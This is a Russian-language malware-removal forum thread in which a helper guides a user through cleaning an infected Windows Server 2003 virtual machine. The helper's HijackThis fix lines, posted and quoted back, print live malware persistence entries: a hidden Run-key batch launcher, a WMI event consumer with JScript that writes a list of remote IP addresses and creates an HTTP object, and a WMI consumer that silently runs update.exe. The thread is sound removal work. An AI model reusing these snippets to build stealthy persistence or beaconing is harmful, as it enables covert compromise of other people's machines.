Помогите избавиться от вируса

Printable View

16.10.2019, 00:01
harkovaa

Помогите избавиться от вируса

Здравствуйте!
Пожалуйста помогите избавиться от вируса.
16.10.2019, 00:02
Info_bot

Уважаемый(ая) [B]harkovaa[/B], спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в [URL="https://virusinfo.info/pravila.html"]правилах оформления запроса о помощи[/URL].

[INFORMATION]Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом [URL="https://virusinfo.info/content.php?r=613-sub_pomogite"]Помогите+[/URL].[/INFORMATION]

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста [URL="https://virusinfo.info/content.php?r=113-virusinfo.info-donate"]поддержите проект[/URL].
16.10.2019, 09:01
Sandor

Здравствуйте!

[URL=http://virusinfo.info/showthread.php?t=4491]"Пофиксите" в HijackThis[/URL]:
[CODE]
O4 - HKLM\..\Run: [BGClients] = C:\WINDOWS\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close();(2702 bytes)
O25 - WMI Event: msupdate - CLASS_FIRST_TEST - Event="__InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", Set objShell = CreateObject("WScript.Shell")¶ objShell.Run "C:\WINDOWS\system32\update.exe"¶
[/CODE]

Перезагрузите компьютер вручную и сделайте повторные логи по [URL="http://virusinfo.info/pravila.html"]правилам[/URL]. ([COLOR="RoyalBlue"]CollectionLog[/COLOR])
16.10.2019, 09:55
harkovaa

[QUOTE=Sandor;1505325]Здравствуйте!

[URL="http://virusinfo.info/showthread.php?t=4491"]"Пофиксите" в HijackThis[/URL]:
[CODE]
O4 - HKLM\..\Run: [BGClients] = C:\WINDOWS\system32\cmd.exe /c start /min c:\windows\system32\wbem\123.bat
O25 - WMI Event: fuckyoumm_consumer - fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('69.30.200.178'+'\r\n'+'45.116.13.219'+'\r\n'+'150.107.76.227'+'\r\n'+'103.213.246.23');f.Close();(2702 bytes)
O25 - WMI Event: msupdate - CLASS_FIRST_TEST - Event="__InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", Set objShell = CreateObject("WScript.Shell")¶ objShell.Run "C:\WINDOWS\system32\update.exe"¶
[/CODE]

Перезагрузите компьютер вручную и сделайте повторные логи по [URL="http://virusinfo.info/pravila.html"]правилам[/URL]. ([COLOR=RoyalBlue]CollectionLog[/COLOR])[/QUOTE]

Пофиксил.
16.10.2019, 12:44
Sandor

Вы не описали как внешне проявляется. Что сейчас с проблемой?
16.10.2019, 13:07
harkovaa

Вложений: 1

[QUOTE=Sandor;1505331]Вы не описали как внешне проявляется. Что сейчас с проблемой?[/QUOTE]

Сильно тормозит система. Постоянные оповещения антивируса об опасных объектах. При санировании Dr.Web CureIt! и Касперский VRT постоянно обнаруживаются вирусы, лечатся но после перезапуска появляются вновь, при сканировании с загрузочной флешки не нахотятся вирусы вообще. При попытке жесткого удаления прекращается отправка исходящих пакетов по сети.
[ATTACH=CONFIG]679557[/ATTACH]
16.10.2019, 13:30
Sandor

Это продолжается и сейчас?
Если да:
Скачайте [url=https://downloads.malwarebytes.com/file/mb3/]Malwarebytes' Anti-Malware[/url]. Установите и запустите.
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
[B][COLOR="Red"]Самостоятельно ничего не удаляйте!!![/COLOR][/B]
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.
16.10.2019, 13:44
harkovaa

Вложений: 1

При попытке установки выдается такое диалоговое окно.

[QUOTE=Sandor;1505336]Это продолжается и сейчас?
Если да:
Скачайте [URL="https://downloads.malwarebytes.com/file/mb3/"]Malwarebytes' Anti-Malware[/URL]. Установите и запустите.
На вкладке "Проверка" - "Полная проверка" нажмите кнопку "Начать проверку". Дождитесь окончания проверки.
[B][COLOR=Red]Самостоятельно ничего не удаляйте!!![/COLOR][/B]
Нажмите кнопку "Сохранить результат - Текстовый файл (*.txt)". Имя сохраняемому файлу дайте любое, например, "scan".
Отчёт прикрепите к сообщению.[/QUOTE]
16.10.2019, 13:57
Sandor

Ах, да, на 2003 эта версия не поставится.

[url=http://virusinfo.info/showthread.php?t=121767][b]Сделайте полный образ автозапуска uVS[/b][/url], только программу скачайте [url=https://yadi.sk/d/6A65LkI1WEuqC]отсюда[/url]

[COLOR="silver"]- - - - -Добавлено - - - - -[/COLOR]

p.s.
Вам необходимо лечить именно виртуальную машину? Вариант переустановить не рассматривается?
16.10.2019, 15:01
harkovaa

Сделал
[QUOTE=Sandor;1505340]Ах, да, на 2003 эта версия не поставится.

[URL="http://virusinfo.info/showthread.php?t=121767"][B]Сделайте полный образ автозапуска uVS[/B][/URL], только программу скачайте [URL="https://yadi.sk/d/6A65LkI1WEuqC"]отсюда[/URL]

[COLOR=silver]- - - - -Добавлено - - - - -[/COLOR]

p.s.
Вам необходимо лечить именно виртуальную машину? Вариант переустановить не рассматривается?[/QUOTE]

Именно лечить. К сожалению переустановка не возможна по определенным причинам.
17.10.2019, 08:18
Sandor

Вы собрали отчет Автологером, а я просил нечто другое.